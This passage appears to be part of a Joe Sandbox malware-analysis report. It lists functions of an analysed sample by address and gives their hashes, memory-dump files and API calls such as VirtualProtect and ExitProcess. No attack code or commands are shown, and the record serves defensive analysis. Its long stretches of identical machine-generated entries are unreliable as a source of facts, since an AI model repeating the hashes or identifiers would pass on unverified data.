                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 2dd88614d34e4d15a5c79062111781d0dde7d213e3835c72698bf74e69743748
                                                                                                                                                                                                                                                                                                • Instruction ID: 1ab33ccecfcf5b50b999c453874eb1a36a3098376a6e5b90a4de9f98f348585e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2dd88614d34e4d15a5c79062111781d0dde7d213e3835c72698bf74e69743748
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A43145B3E056299BF7108A14CC819EA77B9EF84300F1550FAE48D63241D67C4FC28F96
                                                                                                                                                                                                                                                                                                Function 00439BCE Relevance: 1.6, APIs: 1, Instructions: 90memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00000C70,?,?,004398F4,?,?,?,?,?,00000000,?,0043962C), ref: 00439C9E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 3c00bf74d91e0688bd13399e1c7e6aa12c33e8a590711c51d1f7e82f30e369b2
                                                                                                                                                                                                                                                                                                • Instruction ID: e52d79b00cc71ee2398dc142699d77c982fe9885334e7043821f1d8f1332a01d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c00bf74d91e0688bd13399e1c7e6aa12c33e8a590711c51d1f7e82f30e369b2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D231F4B2E055199BFB208A11CC91AEAB7B5EBC5301F1091FAD48D67280D6781FC2CF56
                                                                                                                                                                                                                                                                                                Function 004390E3 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 412e1f2c20d0983e1dad4fe11b2d414e7bc4fcd8a0c6c19b1f180659cb664b96
                                                                                                                                                                                                                                                                                                • Instruction ID: a00f8fb7e5e19df1baf2c4893b4f5cd1aa4009d4866f0ad546c978fab3c233eb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 412e1f2c20d0983e1dad4fe11b2d414e7bc4fcd8a0c6c19b1f180659cb664b96
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C2166F3E05605ABF7108610DC85AEB7379EBD4301F2590BAE84D97280D27C0FC28E62
                                                                                                                                                                                                                                                                                                Function 00439540 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 327d7f2858880219fd52e01a241f8b9574452433bf0ddef6575936ced46be9ef
                                                                                                                                                                                                                                                                                                • Instruction ID: ff2e167dc762c1ef8e920f89ec5326e16b0d5a26b6533a079c5e15a382563c2e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 327d7f2858880219fd52e01a241f8b9574452433bf0ddef6575936ced46be9ef
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03217CB2E0A6559BF7108A14CC81AEA7779EFC1301F1550FAE48D97281C67C0FC28F62
                                                                                                                                                                                                                                                                                                Function 00439963 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 67018eab1eeb88e1bf7ee7ab3dc7d6d6a4e3c26557dd486d047caaf4de155c36
                                                                                                                                                                                                                                                                                                • Instruction ID: 3c547ee69fa93407b955e4b491c610b6713a62dc04fb5845c0adee163d9b120d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67018eab1eeb88e1bf7ee7ab3dc7d6d6a4e3c26557dd486d047caaf4de155c36
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F21F5B2E0661A9BF7108A00CC91AEAB779EFC5301F1550FAE54D67280D67C1FC28F52
                                                                                                                                                                                                                                                                                                Function 00439995 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: aa084a66ee5737fb30ca38a0b1a15924c472f802b6777f03991ed9e752b3daf0
                                                                                                                                                                                                                                                                                                • Instruction ID: 24e34c4b74dd4bd73f0386bd3f67ff0c1536e8184ca5fe0cf7def5f7ee7710d2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa084a66ee5737fb30ca38a0b1a15924c472f802b6777f03991ed9e752b3daf0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7221F5B2E0561A9BF7108A10CC91AEAB779EFC5301F1554FAE54DA7240D67C1FC28F52
                                                                                                                                                                                                                                                                                                Function 004399BA Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 4878a24e5a68b32297b02ebad9e19c3e7aab61bf5ccf1dcc1ea502a904aca359
                                                                                                                                                                                                                                                                                                • Instruction ID: 2150763e04b52f6fcfce34551ee87b3f3efc934614787e6c346313c2175ac9db
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4878a24e5a68b32297b02ebad9e19c3e7aab61bf5ccf1dcc1ea502a904aca359
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4821D3B2E0561A9BF7108A00CC91AEAB779EBD5301F1550FAE54D67240D67C1FC28F52
                                                                                                                                                                                                                                                                                                Function 0043954B Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 3660a830192f971279117e6ae1b31de3075d10796fe787bfa7d46bdd70c7ae6f
                                                                                                                                                                                                                                                                                                • Instruction ID: d6f9cc31d815e164e140b0c1c3b9d3e970f95b56d81fc80633346bf053bc2aa1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3660a830192f971279117e6ae1b31de3075d10796fe787bfa7d46bdd70c7ae6f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 072138B2E055159BF7108601CC81AEAB779EFC5301F2550BAE48DA7280D27C0FC28F52
                                                                                                                                                                                                                                                                                                Function 00451080 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 0045169D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
